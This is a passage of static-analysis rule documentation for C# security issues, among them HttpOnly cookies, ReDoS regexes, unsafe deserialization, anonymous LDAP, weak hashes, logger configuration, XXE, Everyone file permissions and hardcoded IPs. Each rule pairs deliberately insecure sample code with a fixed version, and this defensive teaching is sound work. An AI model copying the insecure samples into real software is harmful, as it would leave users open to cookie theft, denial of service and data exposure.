   </system.web>
</configuration>

See

csharpsquid:S3330

When a cookie is configured with the HttpOnly attribute set to true, the browser guarantees that no client-side script will be able to read it. In most cases, when a cookie is created, the default value of HttpOnly is false, and it is up to the developer to decide whether the content of the cookie can be read by client-side scripts. Since the majority of Cross-Site Scripting (XSS) attacks target the theft of session cookies, the HttpOnly attribute can help reduce their impact, as an XSS vulnerability cannot then be exploited to steal session cookies.

Ask Yourself Whether

  • the cookie is sensitive, used to authenticate the user, for instance a session cookie
  • the HttpOnly attribute offers additional protection (which is not the case for an XSRF-TOKEN cookie / CSRF token, for example)

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • By default the HttpOnly flag should be set to true for most cookies, and it is mandatory for session / sensitive-security cookies.

Sensitive Code Example

When the HttpCookie.HttpOnly property is set to false then the cookie can be accessed by client side code:

HttpCookie myCookie = new HttpCookie("Sensitive cookie");
myCookie.HttpOnly = false; // Sensitive: this cookie is created with the httponly flag set to false and so it can be stolen easily in case of XSS vulnerability

The default value of HttpOnly flag is false, unless overwritten by an application’s configuration file:

HttpCookie myCookie = new HttpCookie("Sensitive cookie");
// Sensitive: this cookie is created without the httponly flag  (by default set to false) and so it can be stolen easily in case of XSS vulnerability

Compliant Solution

Set the HttpCookie.HttpOnly property to true:

HttpCookie myCookie = new HttpCookie("Sensitive cookie");
myCookie.HttpOnly = true; // Compliant: the sensitive cookie is protected against theft thanks to the HttpOnly property set to true (HttpOnly = true)

Or change the default flag values for the whole application by editing the Web.config configuration file:

<httpCookies httpOnlyCookies="true" requireSSL="true" />

  • the requireSSL attribute corresponds programmatically to the Secure field.
  • the httpOnlyCookies attribute corresponds programmatically to the HttpOnly field.

See

csharpsquid:S4784

This rule is deprecated; use S2631 instead.

Using regular expressions is security-sensitive and has led to vulnerabilities in the past.

Evaluating regular expressions against input strings is potentially an extremely CPU-intensive task. Specially crafted regular expressions such as (a+)+s will take several seconds to evaluate the input string aaaaaaaaaaaaaaaaaaaaaaaaaaaaabs. The problem is that with every additional a character added to the input, the time required to evaluate the regex doubles. However, the equivalent regular expression, a+s (without grouping) is efficiently evaluated in milliseconds and scales linearly with the input size.

Evaluating such regular expressions opens the door to Regular expression Denial of Service (ReDoS) attacks. In the context of a web application, attackers can force the web server to spend all of its resources evaluating regular expressions thereby making the service inaccessible to genuine users.

This rule flags any execution of a hardcoded regular expression which has at least 3 characters and at least two instances of any of the following characters: *+{ .

Example: (a+)*

Ask Yourself Whether

  • the executed regular expression is sensitive and a user can provide a string which will be analyzed by this regular expression.
  • your regular expression engine’s performance decreases with specially crafted inputs and regular expressions.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Check whether your regular expression engine (the algorithm executing your regular expression) has any known vulnerabilities. Search for vulnerability reports mentioning the engine you are using.

If the regular expression is vulnerable to ReDoS attacks, mitigate the risk by using a "match timeout" to limit the time spent running the regular expression.

Remember also that a ReDoS attack is possible if a user-provided regular expression is executed. This rule won’t detect that kind of injection.
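The "match timeout" mitigation recommended above can be sketched as follows (the timeout budget and the decision to treat a timeout as a non-match are illustrative policy choices):

```csharp
using System;
using System.Text.RegularExpressions;

public static class SafeRegex
{
    public static bool IsMatchWithTimeout(string input)
    {
        // The timeout bounds worst-case backtracking; tune the budget to your workload.
        var regex = new Regex("(a+)+s", RegexOptions.None, TimeSpan.FromMilliseconds(100));
        try
        {
            return regex.IsMatch(input);
        }
        catch (RegexMatchTimeoutException)
        {
            return false; // treat a timed-out evaluation as a non-match
        }
    }
}
```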

Sensitive Code Example

using System;
using System.Collections.Generic;
using System.Linq;
using System.Runtime.Serialization;
using System.Text.RegularExpressions;
using System.Web;

namespace N
{
    public class RegularExpression
    {
        void Foo(RegexOptions options, TimeSpan matchTimeout, string input,
                 string replacement, MatchEvaluator evaluator)
        {
            // All the following instantiations are Sensitive.
            new System.Text.RegularExpressions.Regex("(a+)+");
            new System.Text.RegularExpressions.Regex("(a+)+", options);
            new System.Text.RegularExpressions.Regex("(a+)+", options, matchTimeout);

            // All the following static methods are Sensitive.
            System.Text.RegularExpressions.Regex.IsMatch(input, "(a+)+");
            System.Text.RegularExpressions.Regex.IsMatch(input, "(a+)+", options);
            System.Text.RegularExpressions.Regex.IsMatch(input, "(a+)+", options, matchTimeout);

            System.Text.RegularExpressions.Regex.Match(input, "(a+)+");
            System.Text.RegularExpressions.Regex.Match(input, "(a+)+", options);
            System.Text.RegularExpressions.Regex.Match(input, "(a+)+", options, matchTimeout);

            System.Text.RegularExpressions.Regex.Matches(input, "(a+)+");
            System.Text.RegularExpressions.Regex.Matches(input, "(a+)+", options);
            System.Text.RegularExpressions.Regex.Matches(input, "(a+)+", options, matchTimeout);

            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+", evaluator);
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+", evaluator, options);
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+", evaluator, options, matchTimeout);
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+", replacement);
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+", replacement, options);
            System.Text.RegularExpressions.Regex.Replace(input, "(a+)+", replacement, options, matchTimeout);

            System.Text.RegularExpressions.Regex.Split(input, "(a+)+");
            System.Text.RegularExpressions.Regex.Split(input, "(a+)+", options);
            System.Text.RegularExpressions.Regex.Split(input, "(a+)+", options, matchTimeout);
        }
    }
}

Exceptions

Some corner-case regular expressions will not raise an issue even though they might be vulnerable. For example: (a|aa)+, (a|a?)+.

It is a good idea to test your regular expression if it has the same pattern on both sides of a "|".

See

csharpsquid:S5766

The deserialization process extracts data from the serialized representation of an object and reconstructs it directly, without calling constructors. Thus, data validation implemented in constructors can be bypassed if serialized objects are controlled by an attacker.

Ask Yourself Whether

  • The data validation implemented in constructors enforces a relevant security check.
  • Objects instantiated via deserialization don’t run the same security checks as the ones executed when objects are created through constructors.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • At the end of the deserialization process it is recommended to perform the same validation checks as the ones performed in constructors, especially when the serialized object can be controlled by an attacker.

Sensitive Code Example

When a serializable class doesn’t implement the ISerializable or IDeserializationCallback interface and has a constructor using its parameters in conditions:

[Serializable]
public class InternalUrl
{
    private string url;

    public InternalUrl(string tmpUrl) // Sensitive
    {
       if(!tmpUrl.StartsWith("http://localhost/")) // there is some input validation
       {
          url= "http://localhost/default";
       }
       else
       {
          url= tmpUrl;
       }
    }
}

When a class implements the ISerializable interface and has a regular constructor using its parameters in conditions, but doesn’t perform the same validation after deserialization:

[Serializable]
public class InternalUrl : ISerializable
{
    private string url;

    public InternalUrl(string tmpUrl) // Sensitive
    {
        if(!tmpUrl.StartsWith("http://localhost/")) // there is some input validation
        {
            url= "http://localhost/default";
        }
        else
        {
            url= tmpUrl;
        }
    }

    // special constructor used during deserialization
    protected InternalUrl(SerializationInfo info, StreamingContext context) // Sensitive
    {
       url= (string) info.GetValue("url", typeof(string));
       // the same validation as seen in the regular constructor is not performed
     }

    void ISerializable.GetObjectData(SerializationInfo info, StreamingContext context)
    {
        info.AddValue("url", url);
    }
}

When a class implements the IDeserializationCallback interface and has a constructor using its parameters in conditions, but the IDeserializationCallback.OnDeserialization method doesn’t perform any conditional checks:

[Serializable]
public class InternalUrl : IDeserializationCallback
{
    private string url;

    public InternalUrl(string tmpUrl) // Sensitive
    {
        if(!tmpUrl.StartsWith("http://localhost/")) // there is some input validation
        {
            url= "http://localhost/default";
        }
        else
        {
            url= tmpUrl;
        }
    }

    void IDeserializationCallback.OnDeserialization(object sender) // Sensitive
    {
       // the same validation as seen in the constructor is not performed
    }
}

Compliant Solution

When using the ISerializable interface to control deserialization, perform the same checks inside the special deserialization constructor (taking SerializationInfo and StreamingContext parameters) as in the regular constructors:

[Serializable]
public class InternalUrl : ISerializable
{
    private string url;

    public InternalUrl(string tmpUrl)
    {
        if(!tmpUrl.StartsWith("http://localhost/")) // there is some input validation
        {
            url= "http://localhost/default";
        }
        else
        {
            url= tmpUrl;
        }
    }

    // special constructor used during deserialization
    protected InternalUrl(SerializationInfo info, StreamingContext context)
    {
       string tmpUrl= (string) info.GetValue("url", typeof(string));

       if(!tmpUrl.StartsWith("http://localhost/")) { // Compliant
          url= "http://localhost/default";
       }
       else {
          url= tmpUrl;
       }
     }

    void ISerializable.GetObjectData(SerializationInfo info, StreamingContext context)
    {
        info.AddValue("url", url);
    }
}

When using the IDeserializationCallback interface to control deserialization, perform the same checks in the IDeserializationCallback.OnDeserialization method after deserialization as in the regular constructors:

[Serializable]
public class InternalUrl : IDeserializationCallback
{
    private string url;

    public InternalUrl(string tmpUrl)
    {
       if(!tmpUrl.StartsWith("http://localhost/")) // there is some input validation
       {
          url= "http://localhost/default";
       }
       else
       {
          url= tmpUrl;
       }
    }

    void IDeserializationCallback.OnDeserialization(object sender) // Compliant
    {
        if(!url.StartsWith("http://localhost/"))
        {
            url= "http://localhost/default";
        }
    }
}

See

csharpsquid:S2257

The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Standard algorithms like AES, RSA, and SHA should be used instead.

This rule tracks custom implementations of these types from the System.Security.Cryptography namespace:

  • AsymmetricAlgorithm
  • AsymmetricKeyExchangeDeformatter
  • AsymmetricKeyExchangeFormatter
  • AsymmetricSignatureDeformatter
  • AsymmetricSignatureFormatter
  • DeriveBytes
  • HashAlgorithm
  • ICryptoTransform
  • SymmetricAlgorithm

Recommended Secure Coding Practices

  • Use a standard algorithm instead of creating a custom one.

Sensitive Code Example

public class CustomHash : HashAlgorithm // Noncompliant
{
    private byte[] result;

    public override void Initialize() => result = null;
    protected override byte[] HashFinal() => result;

    protected override void HashCore(byte[] array, int ibStart, int cbSize) =>
        result ??= array.Take(8).ToArray();
}

Compliant Solution

SHA256 mySHA256 = SHA256.Create();
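A minimal usage sketch of the compliant approach, hashing a string with the standard SHA-256 implementation (the helper name is illustrative):

```csharp
using System;
using System.Security.Cryptography;
using System.Text;

public static class HashingExample
{
    // Hashes input with the framework-provided SHA-256 and returns uppercase hex.
    public static string Sha256Hex(string input)
    {
        using (SHA256 sha256 = SHA256.Create()) // standard algorithm, compliant
        {
            byte[] digest = sha256.ComputeHash(Encoding.UTF8.GetBytes(input));
            return BitConverter.ToString(digest).Replace("-", "");
        }
    }
}
```

For example, Sha256Hex("abc") produces the well-known SHA-256 test vector beginning with BA7816BF.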

See

csharpsquid:S4433

Lightweight Directory Access Protocol (LDAP) servers provide two main authentication methods: SASL and Simple. The Simple Authentication method breaks down into three different mechanisms:

  • Anonymous Authentication
  • Unauthenticated Authentication
  • Name/Password Authentication

A server that accepts either the Anonymous or Unauthenticated mechanisms will accept connections from clients not providing credentials.

Why is this an issue?

When configured to accept the Anonymous or Unauthenticated authentication mechanism, an LDAP server will accept connections from clients that do not provide a password or other authentication credentials. Such users will be able to read or modify part or all of the data contained in the hosted directory.

What is the potential impact?

An attacker exploiting unauthenticated access to an LDAP server can access the data that is stored in the corresponding directory. The impact varies depending on the permission obtained on the directory and the type of data it stores.

Authentication bypass

If attackers get write access to the directory, they will be able to alter most of the data it stores. This might include sensitive technical data such as user passwords or asset configurations. Such an attack can typically lead to an authentication bypass on applications and systems that use the affected directory as an identity provider.

In such a case, all users configured in the directory might see their identity and privileges taken over.

Sensitive information leak

If attackers get read-only access to the directory, they will be able to read the data it stores. That data might include security-sensitive pieces of information.

Typically, attackers might get access to user account lists that they can use in further intrusion steps. For example, they could use such lists to perform password spraying, or related attacks, on all systems that rely on the affected directory as an identity provider.

If the directory contains some Personally Identifiable Information, an attacker accessing it might represent a violation of regulatory requirements in some countries. For example, this kind of security event would go against the European GDPR law.

How to fix it

Code examples

The following code indicates an anonymous LDAP authentication vulnerability because it binds to a remote server using an Anonymous Simple authentication mechanism.

Noncompliant code example

DirectoryEntry myDirectoryEntry = new DirectoryEntry(adPath);
myDirectoryEntry.AuthenticationType = AuthenticationTypes.None; // Noncompliant

DirectoryEntry myDirectoryEntry = new DirectoryEntry(adPath, "u", "p", AuthenticationTypes.None); // Noncompliant

Compliant solution

DirectoryEntry myDirectoryEntry = new DirectoryEntry(myADSPath); // Compliant; default DirectoryEntry.AuthenticationType property value is "Secure" since .NET Framework 2.0

DirectoryEntry myDirectoryEntry = new DirectoryEntry(myADSPath, "u", "p", AuthenticationTypes.Secure);

Resources

Documentation

Standards

csharpsquid:S4790

Cryptographic hash algorithms such as MD2, MD4, MD5, MD6, HAVAL-128, HMAC-MD5, DSA (which uses SHA-1), RIPEMD, RIPEMD-128, RIPEMD-160, HMACRIPEMD160 and SHA-1 are no longer considered secure, because it is possible to have collisions (little computational effort is enough to find two or more different inputs that produce the same hash).

Ask Yourself Whether

The hashed value is used in a security context like:

  • User-password storage.
  • Security token generation (used to confirm e-mail when registering on a website, reset password, etc …​).
  • To compute some message integrity.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Safer alternatives, such as SHA-256, SHA-512, and SHA-3, are recommended. For password hashing, it is even better to use algorithms that are deliberately slow to compute, such as bcrypt, scrypt, Argon2, or PBKDF2, because they slow down brute-force attacks.

Sensitive Code Example

var hashProvider1 = new MD5CryptoServiceProvider(); // Sensitive
var hashProvider2 = (HashAlgorithm)CryptoConfig.CreateFromName("MD5"); // Sensitive
var hashProvider3 = new SHA1Managed(); // Sensitive
var hashProvider4 = HashAlgorithm.Create("SHA1"); // Sensitive

Compliant Solution

var hashProvider1 = new SHA512Managed(); // Compliant
var hashProvider2 = (HashAlgorithm)CryptoConfig.CreateFromName("SHA512Managed"); // Compliant
var hashProvider3 = HashAlgorithm.Create("SHA512Managed"); // Compliant
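For password hashing specifically, a slow key-derivation function is preferable to a plain hash. A minimal sketch using PBKDF2 via the framework's Rfc2898DeriveBytes (the iteration count and sizes are illustrative and should be tuned for your environment):

```csharp
using System;
using System.Security.Cryptography;

public static class PasswordHashing
{
    // Derives a 256-bit key from a password using PBKDF2-HMAC-SHA256.
    // Iteration count is illustrative; higher values slow brute-force attacks.
    public static byte[] DeriveKey(string password, byte[] salt, int iterations = 100_000)
    {
        using (var kdf = new Rfc2898DeriveBytes(password, salt, iterations, HashAlgorithmName.SHA256))
        {
            return kdf.GetBytes(32); // 256-bit derived key
        }
    }
}
```

Store the salt and iteration count alongside the derived key so the computation can be repeated at verification time.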

See

csharpsquid:S4792

Configuring loggers is security-sensitive and has led to vulnerabilities in the past.

Logs are useful before, during and after a security incident.

  • Attackers will most of the time start their nefarious work by probing the system for vulnerabilities. Monitoring this activity and stopping it is the first step to prevent an attack from ever happening.
  • In case of a successful attack, logs should contain enough information to understand what damage an attacker may have inflicted.

Logs are also a target for attackers because they might contain sensitive information. Configuring loggers has an impact on the type of information logged and how it is logged.

This rule flags logger-configuration code for review. The goal is to guide security code reviews.

Ask Yourself Whether

  • unauthorized users might have access to the logs, either because they are stored in an insecure location or because the application gives access to them.
  • the logs contain sensitive information on a production server. This can happen when the logger is in debug mode.
  • the log can grow without limit. This can happen when additional information is written into the logs every time a user performs an action and the user can perform the action as many times as they want.
  • the logs do not contain enough information to understand the damage an attacker might have inflicted. The logger mode (info, warn, error) might filter out important information. It might also omit contextual information such as the precise time of events or the server hostname.
  • the logs are only stored locally instead of being backed up or replicated.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Check that your production deployment doesn’t have its loggers in "debug" mode as it might write sensitive information in logs.
  • Production logs should be stored in a secure location which is only accessible to system administrators.
  • Configure the loggers to display all warnings, info and error messages. Write relevant information such as the precise time of events and the hostname.
  • Choose log format which is easy to parse and process automatically. It is important to process logs rapidly in case of an attack so that the impact is known and limited.
  • Check that the permissions of the log files are correct. If you index the logs in some other service, make sure that the transfer and the service are secure too.
  • Add limits to the size of the logs and make sure that no user can fill the disk with logs. This can happen even when the user does not control the logged information. An attacker could just repeat a logged action many times.

Remember that configuring loggers properly doesn’t make them bullet-proof. Here is a list of recommendations explaining how to use your logs:

  • Don’t log any sensitive information. This obviously includes passwords and credit card numbers, but also any personal information such as user names, locations, etc…​ Usually, any information which is protected by law is a good candidate for removal.
  • Sanitize all user inputs before writing them to the logs. This includes checking their size, content, encoding, syntax, etc…​ As for any user input, validate using whitelists whenever possible. Enabling users to write what they want in your logs can have many impacts. It could, for example, use all your storage space or compromise your log indexing service.
  • Log enough information to monitor suspicious activities and evaluate the impact an attacker might have on your systems. Register events such as failed logins, successful logins, server side input validation failures, access denials and any important transaction.
  • Monitor the logs for any suspicious activity.

Sensitive Code Example

.Net Core: configure programmatically

using System;
using System.Collections;
using System.Collections.Generic;
using Microsoft.AspNetCore.Builder;
using Microsoft.AspNetCore.Hosting;
using Microsoft.Extensions.Configuration;
using Microsoft.Extensions.DependencyInjection;
using Microsoft.Extensions.Logging;
using Microsoft.Extensions.Options;
using Microsoft.AspNetCore;

namespace MvcApp
{
    public class ProgramLogging
    {
        public static IWebHostBuilder CreateWebHostBuilder(string[] args) =>
            WebHost.CreateDefaultBuilder(args)
                .ConfigureLogging((hostingContext, logging) => // Sensitive
                {
                    // ...
                })
                .UseStartup<StartupLogging>();
    }

    public class StartupLogging
    {
        public void ConfigureServices(IServiceCollection services)
        {
            services.AddLogging(logging => // Sensitive
            {
                // ...
            });
        }

        public void Configure(IApplicationBuilder app, IHostingEnvironment env, ILoggerFactory loggerFactory)
        {
            IConfiguration config = null;
            LogLevel level = LogLevel.Critical;
            Boolean includeScopes = false;
            Func<string,Microsoft.Extensions.Logging.LogLevel,bool> filter = null;
            Microsoft.Extensions.Logging.Console.IConsoleLoggerSettings consoleSettings = null;
            Microsoft.Extensions.Logging.AzureAppServices.AzureAppServicesDiagnosticsSettings azureSettings = null;
            Microsoft.Extensions.Logging.EventLog.EventLogSettings eventLogSettings = null;

            // An issue will be raised for each call to an ILoggerFactory extension method adding loggers.
            loggerFactory.AddAzureWebAppDiagnostics(); // Sensitive
            loggerFactory.AddAzureWebAppDiagnostics(azureSettings); // Sensitive
            loggerFactory.AddConsole(); // Sensitive
            loggerFactory.AddConsole(level); // Sensitive
            loggerFactory.AddConsole(level, includeScopes); // Sensitive
            loggerFactory.AddConsole(filter); // Sensitive
            loggerFactory.AddConsole(filter, includeScopes); // Sensitive
            loggerFactory.AddConsole(config); // Sensitive
            loggerFactory.AddConsole(consoleSettings); // Sensitive
            loggerFactory.AddDebug(); // Sensitive
            loggerFactory.AddDebug(level); // Sensitive
            loggerFactory.AddDebug(filter); // Sensitive
            loggerFactory.AddEventLog(); // Sensitive
            loggerFactory.AddEventLog(eventLogSettings); // Sensitive
            loggerFactory.AddEventLog(level); // Sensitive
            loggerFactory.AddEventSourceLogger(); // Sensitive

            IEnumerable<ILoggerProvider> providers = null;
            LoggerFilterOptions filterOptions1 = null;
            IOptionsMonitor<LoggerFilterOptions> filterOptions2 = null;

            LoggerFactory factory = new LoggerFactory(); // Sensitive
            new LoggerFactory(providers); // Sensitive
            new LoggerFactory(providers, filterOptions1); // Sensitive
            new LoggerFactory(providers, filterOptions2); // Sensitive
        }
    }
}

Log4Net

using System;
using System.IO;
using System.Xml;
using log4net.Appender;
using log4net.Config;
using log4net.Repository;

namespace Logging
{
    class Log4netLogging
    {
        void Foo(ILoggerRepository repository, XmlElement element, FileInfo configFile, Uri configUri, Stream configStream,
        IAppender appender, params IAppender[] appenders) {
            log4net.Config.XmlConfigurator.Configure(repository); // Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, element); // Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, configFile); // Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, configUri); // Sensitive
            log4net.Config.XmlConfigurator.Configure(repository, configStream); // Sensitive
            log4net.Config.XmlConfigurator.ConfigureAndWatch(repository, configFile); // Sensitive

            log4net.Config.DOMConfigurator.Configure(); // Sensitive
            log4net.Config.DOMConfigurator.Configure(repository); // Sensitive
            log4net.Config.DOMConfigurator.Configure(element); // Sensitive
            log4net.Config.DOMConfigurator.Configure(repository, element); // Sensitive
            log4net.Config.DOMConfigurator.Configure(configFile); // Sensitive
            log4net.Config.DOMConfigurator.Configure(repository, configFile); // Sensitive
            log4net.Config.DOMConfigurator.Configure(configStream); // Sensitive
            log4net.Config.DOMConfigurator.Configure(repository, configStream); // Sensitive
            log4net.Config.DOMConfigurator.ConfigureAndWatch(configFile); // Sensitive
            log4net.Config.DOMConfigurator.ConfigureAndWatch(repository, configFile); // Sensitive

            log4net.Config.BasicConfigurator.Configure(); // Sensitive
            log4net.Config.BasicConfigurator.Configure(appender); // Sensitive
            log4net.Config.BasicConfigurator.Configure(appenders); // Sensitive
            log4net.Config.BasicConfigurator.Configure(repository); // Sensitive
            log4net.Config.BasicConfigurator.Configure(repository, appender); // Sensitive
            log4net.Config.BasicConfigurator.Configure(repository, appenders); // Sensitive
        }
    }
}

NLog: configure programmatically

namespace Logging
{
    class NLogLogging
    {
        void Foo(NLog.Config.LoggingConfiguration config) {
            NLog.LogManager.Configuration = config; // Sensitive, this changes the logging configuration.
        }
    }
}

Serilog

namespace Logging
{
    class SerilogLogging
    {
        void Foo() {
            new Serilog.LoggerConfiguration(); // Sensitive
        }
    }
}

See

csharpsquid:S2755

This vulnerability allows the usage of external entities in XML.

Why is this an issue?

External Entity Processing allows for XML parsing with the involvement of external entities. However, when this functionality is enabled without proper precautions, it can lead to a vulnerability known as XML External Entity (XXE) attack.

What is the potential impact?

Exposing sensitive data

One significant danger of XXE vulnerabilities is the potential for sensitive data exposure. By crafting malicious XML payloads, attackers can reference external entities that contain sensitive information, such as system files, database credentials, or configuration files. When these entities are processed during XML parsing, the attacker can extract the contents and gain unauthorized access to sensitive data. This poses a severe threat to the confidentiality of critical information.

Exhausting system resources

Another consequence of XXE vulnerabilities is the potential for denial-of-service attacks. By exploiting the ability to include external entities, attackers can construct XML payloads that cause resource exhaustion. This can overwhelm the system’s memory, CPU, or other critical resources, leading to system unresponsiveness or crashes. A successful DoS attack can disrupt the availability of services and negatively impact the user experience.

Forging requests

XXE vulnerabilities can also enable Server-Side Request Forgery (SSRF) attacks. By leveraging the ability to include external entities, an attacker can make the vulnerable application send arbitrary requests to other internal or external systems. This can result in unintended actions, such as retrieving data from internal resources, scanning internal networks, or attacking other systems. SSRF attacks can lead to severe consequences, including unauthorized data access, system compromise, or even further exploitation within the network infrastructure.

How to fix it in .NET

Code examples

The following code contains examples of XML parsers that have external entity processing enabled. As a result, the parsers are vulnerable to XXE attacks if an attacker can control the XML file that is processed.

Noncompliant code example

using System.Xml;

public static void decode()
{
    XmlDocument parser = new XmlDocument();
    parser.XmlResolver = new XmlUrlResolver(); // Noncompliant
    parser.LoadXml("xxe.xml");
}

Compliant solution

XmlDocument is safe by default since .NET Framework 4.5.2. For older versions, set XmlResolver explicitly to null.

using System.Xml;

public static void decode()
{
    XmlDocument parser = new XmlDocument();
    parser.XmlResolver = null;
    parser.LoadXml("xxe.xml");
}

How does this work?

Disable external entities

The most effective approach to prevent XXE vulnerabilities is to disable external entity processing entirely, unless it is explicitly required for specific use cases. By default, XML parsers should be configured to reject the processing of external entities. This can be achieved by setting the appropriate properties or options in your XML parser library or framework.

If external entity processing is necessary for certain scenarios, adopt a whitelisting approach to restrict the entities that can be resolved during XML parsing. Create a list of trusted external entities and disallow all others. This approach ensures that only known and safe entities are processed.
You should rely on features provided by your XML parser to restrict the external entities.
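For instance, when parsing with XmlReader, DTD processing (and therefore external entity resolution) can be disabled through XmlReaderSettings. A minimal sketch, with the helper name illustrative:

```csharp
using System.IO;
using System.Xml;

public static class SafeXmlParsing
{
    // Creates a reader that rejects DTDs and never resolves external resources.
    public static XmlReader CreateSafeReader(Stream input)
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Prohibit, // reject any DOCTYPE declaration
            XmlResolver = null                      // never fetch external resources
        };
        return XmlReader.Create(input, settings);
    }
}
```

With these settings, a document containing a DOCTYPE declaration causes the reader to throw an XmlException instead of resolving entities.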

Resources

Standards

csharpsquid:S2612

In Unix, the "others" class refers to all users except the owner of the file and the members of the group assigned to the file.

In Windows, the "Everyone" group is similar: it includes all members of the Authenticated Users group, as well as the built-in Guest account and several other built-in security accounts.

Granting permissions to these groups can lead to unintended access to files.

Ask Yourself Whether

  • The application is designed to be run on a multi-user environment.
  • Corresponding files and directories may contain confidential information.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

The most restrictive possible permissions should be assigned to files and directories.

Sensitive Code Example

.Net Framework:

var unsafeAccessRule = new FileSystemAccessRule("Everyone", FileSystemRights.FullControl, AccessControlType.Allow);

var fileSecurity = File.GetAccessControl("path");
fileSecurity.AddAccessRule(unsafeAccessRule); // Sensitive
fileSecurity.SetAccessRule(unsafeAccessRule); // Sensitive
File.SetAccessControl("path", fileSecurity);

.Net / .Net Core

var fileInfo = new FileInfo("path");
var fileSecurity = fileInfo.GetAccessControl();

fileSecurity.AddAccessRule(new FileSystemAccessRule("Everyone", FileSystemRights.Write, AccessControlType.Allow)); // Sensitive
fileInfo.SetAccessControl(fileSecurity);

.Net / .Net Core using Mono.Posix.NETStandard

var fileSystemEntry = UnixFileSystemInfo.GetFileSystemEntry("path");
fileSystemEntry.FileAccessPermissions = FileAccessPermissions.OtherReadWriteExecute; // Sensitive

Compliant Solution

.Net Framework

var safeAccessRule = new FileSystemAccessRule("Everyone", FileSystemRights.FullControl, AccessControlType.Deny);

var fileSecurity = File.GetAccessControl("path");
fileSecurity.AddAccessRule(safeAccessRule);
File.SetAccessControl("path", fileSecurity);

.Net / .Net Core

var safeAccessRule = new FileSystemAccessRule("Everyone", FileSystemRights.FullControl, AccessControlType.Deny);

var fileInfo = new FileInfo("path");
var fileSecurity = fileInfo.GetAccessControl();
fileSecurity.SetAccessRule(safeAccessRule);
fileInfo.SetAccessControl(fileSecurity);

.Net / .Net Core using Mono.Posix.NETStandard

var fs = UnixFileSystemInfo.GetFileSystemEntry("path");
fs.FileAccessPermissions = FileAccessPermissions.UserExecute;

See

csharpsquid:S1313

Hardcoding IP addresses is security-sensitive and has led to vulnerabilities in the past.

Today’s services have an ever-changing architecture due to their scaling and redundancy needs. It is a mistake to think that a service will always have the same IP address. When it does change, the hardcoded IP will have to be modified too. This will have an impact on the product development, delivery, and deployment:

  • The developers will have to do a rapid fix every time this happens, instead of having an operation team change a configuration file.
  • It encourages the mistaken use of the same address in every environment (dev, sys, qa, prod).

Last but not least, it has an effect on application security. Attackers might be able to decompile the code and thereby discover a potentially sensitive address. They can perform a Denial of Service attack on the service, try to get access to the system, or try to spoof the IP address to bypass security checks. Such attacks are always possible, but in the case of a hardcoded IP address, solving the issue will take more time, which will increase an attack’s impact.

Ask Yourself Whether

The disclosed IP address is sensitive, e.g.:

  • Can give information to an attacker about the network topology.
  • It’s a personal (assigned to an identifiable person) IP address.

There is a risk if you answered yes to any of these questions.

Recommended Secure Coding Practices

Don’t hard-code the IP address in the source code; instead, make it configurable with environment variables, configuration files, or a similar approach. Alternatively, if confidentiality is not required, a domain name can be used, since it allows the destination to be changed quickly without rebuilding the software.

Sensitive Code Example

var ip = "192.168.12.42";
var address = IPAddress.Parse(ip);

Compliant Solution

var ip = ConfigurationManager.AppSettings["myapplication.ip"];
var address = IPAddress.Parse(ip);

Exceptions

No issue is reported for the following cases because they are not considered sensitive:

  • Loopback addresses 127.0.0.0/8 in CIDR notation (from 127.0.0.0 to 127.255.255.255)
  • Broadcast address 255.255.255.255
  • Non-routable address 0.0.0.0
  • Strings of the form 2.5.<number>.<number> as they often match Object Identifiers (OID)
  • Addresses in the ranges 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24, reserved for documentation purposes by RFC 5737
  • Addresses in the range 2001:db8::/32, reserved for documentation purposes by RFC 3849

See

csharpsquid:S4829

This rule is deprecated, and will eventually be removed.

Reading standard input is security-sensitive and has led to vulnerabilities in the past.

It is common for attackers to craft inputs enabling them to exploit software vulnerabilities. Thus any data read from the standard input (stdin) can be dangerous and should be validated.

This rule flags code that reads from the standard input.

Ask Yourself Whether

  • data read from the standard input is not sanitized before being used.

You are at risk if you answered yes to this question.

Recommended Secure Coding Practices

Sanitize all data read from the standard input before using it.
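A minimal sketch of whitelist validation applied to standard input; the pattern, length limit, and helper names are illustrative only:

```csharp
using System;
using System.Text.RegularExpressions;

public static class StdinValidation
{
    // Illustrative whitelist: letters, digits, '-' and '_', up to 64 characters.
    private static readonly Regex Allowed = new Regex(@"^[A-Za-z0-9_-]{1,64}$");

    public static bool IsValid(string line) => line != null && Allowed.IsMatch(line);

    public static string ReadValidatedLine()
    {
        string line = Console.ReadLine(); // Sensitive: raw standard input
        if (!IsValid(line))
        {
            throw new FormatException("Input rejected by whitelist validation.");
        }
        return line;
    }
}
```

Validating against a whitelist, rather than trying to blacklist dangerous characters, is the approach recommended for any user input.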

Sensitive Code Example

using System;
public class C
{
    public void Main()
    {
        var input = Console.In; // Sensitive
        var code = Console.Read(); // Sensitive
        var keyInfo = Console.ReadKey(...); // Sensitive
        var text = Console.ReadLine(); // Sensitive
        Console.OpenStandardInput(...); // Sensitive
    }
}

Exceptions

This rule does not raise issues when the return value of the Console.Read, Console.ReadKey, or Console.ReadLine methods is ignored.

using System;
public class C
{
    public void Main()
    {
        Console.ReadKey(...); // Return value is ignored
        Console.ReadLine(); // Return value is ignored
    }
}

See

csharpsquid:S4823

This rule is deprecated, and will eventually be removed.

Using command line arguments is security-sensitive and has led to vulnerabilities in the past.

Command line arguments can be dangerous just like any other user input. They should never be used without being first validated and sanitized.

Remember also that any user can retrieve the list of processes running on a system, which makes the arguments provided to them visible. Thus, passing sensitive information via command line arguments should be considered insecure.

This rule raises an issue on every program entry point (main method) where command line arguments are used. The goal is to guide security code reviews.

Ask Yourself Whether

  • any of the command line arguments are used without being sanitized first.
